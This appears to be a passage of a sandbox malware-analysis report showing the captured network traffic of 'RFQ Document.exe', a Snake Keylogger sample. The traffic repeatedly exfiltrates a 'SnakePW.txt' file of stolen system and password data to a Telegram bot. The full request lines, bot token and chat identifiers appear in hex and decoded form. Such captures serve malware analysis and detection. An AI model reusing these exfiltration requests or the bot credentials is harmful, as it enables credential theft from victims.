                                            Data Ascii: {"ok":true,"result":{"message_id":12877,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808786,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            289192.168.2.450126149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:46 UTC460OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f539ff42
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:46 UTC460OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 35 33 39 66 66 34 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255f539ff42Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:46 UTC461INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:46 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:46 UTC461INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 37 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 36 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12878,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808786,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            29192.168.2.449803149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:26 UTC46OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255c5542ea6
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:26 UTC46OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 35 35 34 32 65 61 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255c5542ea6Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:26 UTC46INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:26 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:26 UTC47INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 30 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 36 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12609,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808706,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            290192.168.2.450127149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:47 UTC462OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f54f76ba
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:47 UTC462OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 35 34 66 37 36 62 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255f54f76baContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:47 UTC462INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:47 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:47 UTC463INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 37 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 37 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12879,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808787,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            291192.168.2.450128149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:47 UTC463OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f5674ca3
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:47 UTC463OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 35 36 37 34 63 61 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255f5674ca3Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:47 UTC464INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:47 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:47 UTC464INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 38 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 37 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12880,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808787,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            292192.168.2.450129149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:47 UTC465OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f57f2362
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:47 UTC465OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 35 37 66 32 33 36 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255f57f2362Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:47 UTC465INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:47 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:47 UTC466INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 38 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 37 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12881,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808787,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            293192.168.2.450130149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:47 UTC466OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f59bc08b
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:47 UTC467OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 35 39 62 63 30 38 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255f59bc08bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:47 UTC467INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:47 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:47 UTC467INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 38 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 37 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12882,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808787,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            294192.168.2.450131149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:47 UTC468OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f5b39700
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:47 UTC468OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 35 62 33 39 37 30 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255f5b39700Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:47 UTC469INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:47 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:47 UTC469INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 38 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 37 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12884,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808787,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            295192.168.2.450132149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:47 UTC470OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f5d9be34
                                            Host: api.telegram.org
                                            Content-Length: 407
